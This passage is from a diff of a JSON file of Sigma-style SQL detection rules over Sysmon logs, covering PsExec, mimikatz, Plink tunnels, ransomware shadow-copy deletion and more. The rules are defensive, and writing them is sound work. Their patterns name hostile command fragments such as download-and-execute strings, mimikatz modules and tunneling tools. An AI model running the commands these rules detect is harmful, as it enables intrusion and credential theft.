'1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" + "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" }, { - "title": "PowerShell Get-Clipboard Cmdlet Via CLI", - "id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "title": "Psexec Execution", + "id": "730fc21b-eaff-474b-ad23-90fd265d4988", "status": "test", - "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects user accept agreement execution in psexec commandline", + "author": "omkar72", "tags": [ - "attack.collection", - "attack.t1115" + "attack.execution", + "attack.t1569", + "attack.t1021" ], "falsepositives": [ - "Unknown" + "Administrative scripts." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Get-Clipboard%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR OriginalFileName = 'psexec.c'))" ], - "filename": "proc_creation_win_powershell_get_clipboard.yml" + "filename": "proc_creation_win_sysinternals_psexec_execution.yml" }, { - "title": "Suspicious Add Scheduled Command Pattern", - "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "title": "Potential Signing Bypass Via Windows Developer Features", + "id": "a383dec4-deec-4e6e-913b-ed9249670848", "status": "experimental", - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". 
Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE 
'\\'))" ], - "filename": "proc_creation_win_schtasks_susp_pattern.yml" + "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" }, { - "title": "Exfiltration and Tunneling Tools Execution", - "id": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", - "status": "test", - "description": "Execution of well known tools for data exfiltration and tunneling", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "Weak or Abused Passwords In CLI", + "id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "status": "experimental", + "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1041", - "attack.t1572", - "attack.t1071.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Legitimate Administrator using tools" + "Legitimate usage of the passwords by users via commandline (should be discouraged)", + "Other currently unknown false positives" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\plink.exe' ESCAPE '\\' OR Image LIKE '%\\\\socat.exe' ESCAPE '\\' OR Image LIKE '%\\\\stunnel.exe' ESCAPE '\\' OR Image LIKE '%\\\\httptunnel.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Asd123.aaaa%' ESCAPE '\\' OR CommandLine LIKE '%password123%' ESCAPE '\\' OR CommandLine LIKE '%123456789%' ESCAPE '\\' OR CommandLine LIKE '%P@ssw0rd!%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" + "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml" }, { - "title": "Suspicious aspnet_compiler.exe 
Execution", - "id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "title": "Execution via WorkFolders.exe", + "id": "0bbc6369-43e3-453d-9944-cae58821c173", "status": "test", - "description": "Execute C# code with the Build Provider and proper folder structure in place.", - "author": "frack113", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%aspnet\\_compiler.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_aspnet_compiler.yml" + "filename": "proc_creation_win_susp_workfolders.yml" }, { - "title": "HackTool - F-Secure C3 Load by Rundll32", - "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "title": "Suspicious Plink Port Forwarding", + "id": "48a61b29-389f-4032-b317-b30de6b95314", "status": "test", - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "author": "Alfie Champion (ajpc500)", + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port 
forwarding to a local port" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" + "filename": "proc_creation_win_plink_port_forwarding.yml" }, { - "title": "WSL Child Process Anomaly", - "id": "2267fe65-0681-42ad-9a6d-46553d3f3480", - "status": "experimental", - "description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - PurpleSharp Execution", + "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "status": "test", + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1587", + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wslhost.exe' ESCAPE '\\') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image 
LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wsl_child_processes_anomalies.yml" + "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" }, { - "title": "InfDefaultInstall.exe .inf Execution", - "id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", - "status": "test", - "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", - "author": "frack113", + "title": "Wscript Execution from Non C Drive", + "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", + "status": "experimental", + "description": "Detects Wscript or Cscript executing from a drive other than C. 
This has been observed with Qakbot executing from within a mounted ISO file.", + "author": "Aaron Herman", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate scripts located on other partitions such as \"D:\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%InfDefaultInstall.exe %' ESCAPE '\\' AND CommandLine LIKE '%.inf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\') AND CommandLine LIKE '%:\\\\%' ESCAPE '\\') AND NOT (((CommandLine LIKE '% C:\\\\\\*' ESCAPE '\\' OR CommandLine LIKE '% ''C:\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \"C:\\\\\\*' ESCAPE '\\')) OR (CommandLine LIKE '%\\%%' ESCAPE '\\') OR (CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')))" ], - "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" + "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml" }, { - "title": "Suspicious Invoke-WebRequest Usage", - "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "title": "PUA - 3Proxy Execution", + "id": "f38a82d2-fba3-4781-b549-525efbec8506", "status": "experimental", - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of 3proxy, a tiny free proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
(EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" + "filename": "proc_creation_win_pua_3proxy_execution.yml" }, { - "title": "PUA - Fast Reverse Proxy (FRP) Execution", - "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", + "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", "status": "experimental", - "description": "Detects the use of Fast Reverse Proxy. 
frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "author": "frack113, Florian Roth", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1090" + "attack.t1219" ], "falsepositives": [ - "Legitimate use" + "Legitimate use of AnyDesk from a non-standard folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\frpc.exe' ESCAPE '\\' OR Image LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR Image 
LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_frp.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" }, { - "title": "Potential Maze Ransomware Activity", - "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "title": "Potential MuddyWater APT Activity", + "id": "36222790-0d43-4fe8-86e4-674b27809543", "status": "test", - "description": "Detects specific process characteristics of Maze ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential Muddywater APT activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" + "attack.g0069" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND Image LIKE '%.tmp' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE 
'\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_maze_ransomware.yml" + "filename": "proc_creation_win_apt_muddywater_activity.yml" }, { - "title": "DeviceCredentialDeployment Execution", - "id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", - "status": "experimental", - "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential ACTINIUM Persistence Activity", + "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "status": "test", + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DeviceCredentialDeployment.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_device_credential_deployment.yml" + "filename": "proc_creation_win_apt_actinium_persistence.yml" }, { - "title": "Port Forwarding Attempt Via SSH", - "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", - "status": "experimental", - "description": "Detects suspicious SSH tunnel port forwarding to a local port", - "author": "Nasreddine 
Bencherchali (Nextron Systems)", + "title": "Writing Of Malicious Files To The Fonts Folder", + "id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", + "status": "test", + "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", + "author": "Sreeman", "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1572", - "attack.t1021.001", - "attack.t1021.004" + "attack.t1211", + "attack.t1059", + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%type%' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\' OR CommandLine LIKE '%cacls%' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh%' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' 
ESCAPE '\\' OR CommandLine LIKE '%.msi%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ssh_port_forward.yml" + "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" }, { - "title": "Taskmgr as LOCAL_SYSTEM", - "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "title": "Sdiagnhost Calling Suspicious Child Process", + "id": "f3d39c45-de1a-4486-a687-ab126124f744", "status": "experimental", - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_taskmgr_localsystem.yml" + "filename": "proc_creation_win_sdiagnhost_susp_child.yml" }, { - "title": "PUA - AdvancedRun Suspicious Execution", - "id": "fa00b701-44c6-4679-994d-5a18afa8a707", - "status": "experimental", - "description": 
"Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Mimikatz Execution", + "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "status": "test", + "description": "Detection well-known mimikatz command line arguments", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR 
(CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" + "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" }, { - "title": "PowerShell Get-Process LSASS", - "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", + "title": "Suspicious Rundll32 Activity Invoking Sys File", + "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", "status": "test", - "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine 